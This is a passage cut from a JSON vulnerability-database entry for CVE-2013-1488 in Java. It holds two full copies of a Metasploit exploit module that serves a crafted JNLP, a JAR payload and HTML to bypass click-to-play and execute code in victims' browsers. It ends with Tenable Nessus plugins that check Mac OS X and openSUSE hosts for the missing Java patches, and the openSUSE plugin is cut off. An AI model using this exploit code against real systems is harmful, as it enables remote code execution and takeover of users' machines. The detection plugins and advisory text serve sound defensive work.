width=\"1\" height=\"1\"></applet> \n</object> \n</body> \n</html> \n| \nreturn html \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121956/java_jre17_driver_manager.rb.txt"}], "zdt": [{"lastseen": "2018-02-20T01:28:33", "bulletinFamily": "exploit", "description": "This Metasploit module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes, from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.", "modified": "2013-06-10T00:00:00", "published": "2013-06-10T00:00:00", "id": "1337DAY-ID-20868", "href": "https://0day.today/exploit/description/20868", "type": "zdt", "title": "Java Applet Driver Manager Privileged toString() Remote Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({ :javascript => false })\r\n\r\n def initialize( info = {} )\r\n\r\n super( update_info( info,\r\n 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',\r\n 'Description' => %q{\r\n This module abuses the java.sql.DriverManager class where the toString() method\r\n is called over user supplied classes, from a doPrivileged block. The vulnerability\r\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE\r\n throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java\r\n Web Start can be launched automatically throw the ActiveX control. Otherwise the\r\n applet is launched without click-to-play bypass.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # Vulnerability discovery and Analysis\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1488' ],\r\n [ 'OSVDB', '91472' ],\r\n [ 'BID', '58504' ],\r\n [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],\r\n [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]\r\n ],\r\n 'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Platform' => ['java'],\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows x86 (Native Payload)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Linux x86 (Native Payload)',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 10 2013'\r\n ))\r\n end\r\n\r\n\r\n def setup\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"Exploit.class\")\r\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver.class\")\r\n @driver_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"FakeDriver2.class\")\r\n @driver2_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.lang.Object\")\r\n @object_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.sql.Driver\")\r\n @driver_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n\r\n @jnlp_name = rand_text_alpha(8)\r\n\r\n super\r\n end\r\n\r\n def jnlp_file\r\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\r\n\r\n jnlp = %Q|\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<jnlp spec=\"1.0\" xmlns:jfx=\"http://javafx.com\" href=\"#{jnlp_uri}\">\r\n <information>\r\n <title>Applet Test JNLP</title>\r\n <vendor>#{rand_text_alpha(8)}</vendor>\r\n <description>#{rand_text_alpha(8)}</description>\r\n <offline-allowed/>\r\n </information>\r\n\r\n <resources>\r\n <j2se version=\"1.7+\" href=\"http://java.sun.com/products/autodl/j2se\" />\r\n <jar href=\"#{rand_text_alpha(8)}.jar\" main=\"true\" />\r\n </resources>\r\n <applet-desc name=\"#{rand_text_alpha(8)}\" main-class=\"#{@exploit_class_name}\" width=\"1\" height=\"1\">\r\n <param name=\"__applet_ssv_validated\" value=\"true\"></param>\r\n </applet-desc>\r\n <update check=\"background\"/>\r\n</jnlp>\r\n |\r\n return jnlp\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"handling request for #{request.uri}\")\r\n\r\n case request.uri\r\n when /\\.jnlp$/i\r\n send_response(cli, jnlp_file, { 'Content-Type' => \"application/x-java-jnlp-file\" })\r\n when /\\.jar$/i\r\n jar = payload.encoded_jar\r\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n jar.add_file(\"FakeDriver.class\", @driver_class)\r\n jar.add_file(\"FakeDriver2.class\", @driver2_class)\r\n jar.add_file(\"META-INF/services/java.lang.Object\", @object_services)\r\n jar.add_file(\"META-INF/services/java.sql.Driver\", @driver_services)\r\n metasploit_str = rand_text_alpha(\"metasploit\".length)\r\n payload_str = rand_text_alpha(\"payload\".length)\r\n jar.entries.each { |entry|\r\n entry.name.gsub!(\"metasploit\", metasploit_str)\r\n entry.name.gsub!(\"Payload\", payload_str)\r\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n entry.data = entry.data.gsub(\"Payload\", payload_str)\r\n }\r\n jar.build_manifest\r\n\r\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n when /\\/$/\r\n payload = regenerate_payload(cli)\r\n if not payload\r\n print_error(\"Failed to generate the payload.\")\r\n send_not_found(cli)\r\n return\r\n end\r\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n else\r\n send_redirect(cli, get_resource() + '/', '')\r\n end\r\n\r\n end\r\n\r\n def generate_html\r\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\r\n\r\n # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass\r\n # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass\r\n html = %Q|\r\n <html>\r\n <body>\r\n <object codebase=\"http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0\" classid=\"clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284\" height=0 width=0>\r\n <param name=\"app\" value=\"#{jnlp_uri}\">\r\n <param name=\"back\" value=\"true\">\r\n <applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\"></applet>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n return html\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20868"}], "metasploit": [{"lastseen": "2019-11-14T13:03:05", "bulletinFamily": "exploit", "description": "This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.\n", "modified": "2017-07-24T13:26:21", "published": "2013-06-07T18:39:19", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_DRIVER_MANAGER", "href": "", "type": "metasploit", "title": "Java Applet Driver Manager Privileged toString() Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',\n 'Description' => %q{\n This module abuses the java.sql.DriverManager class where the toString() method\n is called over user supplied classes from a doPrivileged block. The vulnerability\n affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer\n and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java\n Web Start can be launched automatically through the ActiveX control. Otherwise, the\n applet is launched without click-to-play bypass.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Forshaw', # Vulnerability discovery and Analysis\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1488' ],\n [ 'OSVDB', '91472' ],\n [ 'BID', '58504' ],\n [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],\n [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],\n [ 'ZDI', '13-076' ]\n ],\n 'Platform' => %w{ java linux osx win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 10 2013'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1488\", \"Exploit.class\")\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1488\", \"FakeDriver.class\")\n @driver_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1488\", \"FakeDriver2.class\")\n @driver2_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.lang.Object\")\n @object_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-1488\", \"META-INF\", \"services\", \"java.sql.Driver\")\n @driver_services = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n\n @jnlp_name = rand_text_alpha(8)\n\n super\n end\n\n def jnlp_file\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\n\n jnlp = %Q|\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<jnlp spec=\"1.0\" xmlns:jfx=\"http://javafx.com\" href=\"#{jnlp_uri}\">\n <information>\n <title>Applet Test JNLP</title>\n <vendor>#{rand_text_alpha(8)}</vendor>\n <description>#{rand_text_alpha(8)}</description>\n <offline-allowed/>\n </information>\n\n <resources>\n <j2se version=\"1.7+\" href=\"http://java.sun.com/products/autodl/j2se\" />\n <jar href=\"#{rand_text_alpha(8)}.jar\" main=\"true\" />\n </resources>\n <applet-desc name=\"#{rand_text_alpha(8)}\" main-class=\"#{@exploit_class_name}\" width=\"1\" height=\"1\">\n <param name=\"__applet_ssv_validated\" value=\"true\"></param>\n </applet-desc>\n <update check=\"background\"/>\n</jnlp>\n |\n return jnlp\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jnlp$/i\n send_response(cli, jnlp_file, { 'Content-Type' => \"application/x-java-jnlp-file\" })\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\n jar.add_file(\"FakeDriver.class\", @driver_class)\n jar.add_file(\"FakeDriver2.class\", @driver2_class)\n jar.add_file(\"META-INF/services/java.lang.Object\", @object_services)\n jar.add_file(\"META-INF/services/java.sql.Driver\", @driver_services)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n jnlp_uri = \"#{get_uri}/#{@jnlp_name}.jnlp\"\n\n # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass\n # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass\n html = %Q|\n <html>\n <body>\n <object codebase=\"http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0\" classid=\"clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284\" height=0 width=0>\n <param name=\"app\" value=\"#{jnlp_uri}\">\n <param name=\"back\" value=\"true\">\n <applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\"></applet>\n </object>\n </body>\n </html>\n |\n return html\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_jre17_driver_manager.rb"}], "nessus": [{"lastseen": "2019-10-28T20:40:06", "bulletinFamily": "scanner", "description": "The remote Mac OS X host has a version of Java for Mac OS X 10.6 that\nis missing Update 13, which updates the Java version to 1.6.0_41. It\nis, therefore, affected by several security vulnerabilities, the most\nserious of which may allow an untrusted Java applet to execute arbitrary\ncode with the privileges of the current user outside the Java sandbox.", "modified": "2013-02-20T00:00:00", "id": "MACOSX_JAVA_10_6_UPDATE13.NASL", "href": "https://www.tenable.com/plugins/nessus/64699", "published": "2013-02-20T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.6 Update 13", "type": "nessus", "sourceData": "#TRUSTED af743fadfc57589b5937d723d11b812cc40928d6e743f67badb53742b4d1e47000e334613ef4ef486b5160c830afdbde51e3543967639ea397a1a91e493732005d5d1670477f4d74a723ca8ac4541d416642e33164078af93d20ce450788ed483964b646cec498e4e348b6d53a6f3b085bbc33ffcc2841b905a43c3b88bd2fbddc87ec326c7cad6590c8be327459e1a260f45ddcde41dd4cdc9f2767e0f4c4b3e9cbda464ac2906f59ed99aa454e47df98d510b8e691aa95ecbe7b18569576f3dc02407bff233ec911c01c701c4a823bb41dde0e79691d0152016b286cf24874400da0ec1f344f12a56e6719976dc1eb1f3899e5153f070de8ef595687e6b85cd80ff698379ebe9c9bfec76da0f841f45500d4de78ae8acaf7da3f97a566dc85c2ded21ffd4a0fa0e9e827dc9ae9b165efecb6a7e15bb189283bb5826ff103c97be4d0040619af3baaa282ea604c841f8ab4eadf81af6e43148dfd4b7d025f836309f492f1370634ad794f1771c3ec2cf7c78c43c50b52d4a453cbb996fbb7b21d560d3b3e363fc8cab7b729b9d526f78b5b478c40e319567d62e8190619aef726e207fff6f20d64d41063ce5633bf14b0e6f4d83487c74f781918940527f497d8dff2722f5ac4c812241ef3e03c17f41cb924f24ffbe87a925097aa4ff498f9c58723b8e71ffef1f47fb41758512ced446fab4b455f5828233811e254f92015\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64699);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\"CVE-2013-1486\", \"CVE-2013-1487\", \"CVE-2013-1488\");\n script_bugtraq_id(58029, 58031);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2013-02-19-1\");\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.6 Update 13\");\n script_summary(english:\"Checks version of the JavaVM framework\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Mac OS X host has a version of Java for Mac OS X 10.6 that\nis missing Update 13, which updates the Java version to 1.6.0_41. It\nis, therefore, affected by several security vulnerabilities, the most\nserious of which may allow an untrusted Java applet to execute arbitrary\ncode with the privileges of the current user outside the Java sandbox.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT5666\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2013/Feb/msg00002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/525745/30/0/threaded\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Java for Mac OS X 10.6 Update 13, which includes version\n13.9.2 of the JavaVM Framework.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:java_1.6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.6([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.6\");\n\n\nplist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\ncmd =\n 'plutil -convert xml1 -o - \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleVersion | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec_cmd(cmd:cmd);\nif (!strlen(version)) exit(1, \"Failed to get the version of the JavaVM Framework.\");\n\nversion = chomp(version);\nif (!ereg(pattern:\"^[0-9]+\\.\", string:version)) exit(1, \"The JavaVM Framework version does not appear to be numeric (\"+version+\").\");\n\nfixed_version = \"13.9.2\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Framework : JavaVM' +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"JavaVM Framework\", version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:00:35", "bulletinFamily": "scanner", "description": " - update to icedtea-2.3.9 (bnc#816720) \n\n - Security fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8008140: Better method handle resolution\n\n - S8009049, CVE-2013-2436: Better method handle binding\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009677, CVE-2013-2423: Better setting of setters\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - Backports\n\n - S7130662, RH928500: GTK file dialog crashes with a NPE\n\n - Bug fixes\n\n - PR1363: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1401: Fix Zero build on 2.3.8\n\n - Fix offset problem in ICU LETableReference.\n\n - Change -Werror fix to preserve OpenJDK default.\n\n - PR1303: Correct #ifdef to #if\n\n - PR1404: Failure to bootstrap with ecj 4.2\n\n - Added url as source. Please see\n http://en.opensuse.org/SourceUrls\n\n - icedtea-2.3.8-zero-patches.patch: remove patch not\n applicable to zero compatible hotspot\n\n - java-1.7.0-openjdk-fork.patch: Add support for\n architectures without fork syscall\n\n - java-1.7.0-openjdk-aarch64.patch: Add support for\n aarch64", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2013-426.NASL", "href": "https://www.tenable.com/plugins/nessus/74999", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0964-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-426.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74999);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/19 11:02:42\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2423\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\", \"CVE-2013-2436\");\n\n script_name(english:\"openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0964-1)\");\n script_summary(english:\"Check for the openSUSE-2013-426 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to icedtea-2.3.9 (bnc#816720) \n\n - Security fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8008140: Better method handle resolution\n\n - S8009049, CVE-2013-2436: Better method handle binding\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009677, CVE-2013-2423: Better setting of setters\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - Backports\n\n - S7130662, RH928500: GTK file dialog crashes with a NPE\n\n - Bug fixes\n\n - PR1363: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1401: Fix Zero build on 2.3.8\n\n - Fix offset problem in ICU LETableReference.\n\n - Change -Werror fix to preserve OpenJDK default.\n\n - PR1303: Correct #ifdef to #if\n\n - PR1404: Failure to bootstrap with ecj 4.2\n\n - Added url as source. Please see\n http://en.opensuse.org/SourceUrls\n\n - icedtea-2.3.8-zero-patches.patch: remove patch not\n applicable to zero compatible hotspot\n\n - java-1.7.0-openjdk-fork.patch: Add support for\n architectures without fork syscall\n\n - java-1.7.0-openjdk-aarch64.patch: Add support for\n aarch64\"\n );\n # http://en.opensuse.org/SourceUrls\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://en.opensuse.org/SourceUrls\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=816720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-06/msg00099.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_7_0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Reflection Type Confusion Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 